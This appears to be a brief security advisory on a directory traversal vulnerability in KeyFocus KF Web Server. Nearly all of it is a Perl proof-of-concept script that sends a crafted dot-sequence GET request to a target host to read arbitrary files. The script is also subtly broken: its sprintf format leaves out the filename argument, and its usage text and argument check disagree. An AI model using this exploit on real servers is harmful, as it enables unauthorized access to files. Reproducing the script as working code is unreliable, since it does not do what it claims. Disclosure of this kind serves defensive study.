|
KeyFocus KF Web Server Directory Traversal Vulnerability
The following proof of concept script was provided by mattmurphy@kc.rr.com <mattmurphy@kc.rr.com>: #!/usr/bin/perl use URI::Escape; use IO::Socket; if (@ARGV < 2) { print STDOUT "Usage: perl $0 [filename] [host] [port]"; } else { $f = IO::Socket::INET->new(PeerAddr=>$ARGV[1],PeerPort=>$ARGV[2],Proto=>"tcp"); $url = uri_escape($ARGV[0]); $exploit = sprintf("GET /.............../%s HTTP/1.0\r\n\r\n"); print $f $exploit; undef $f; } |
|
|
Privacy Statement |
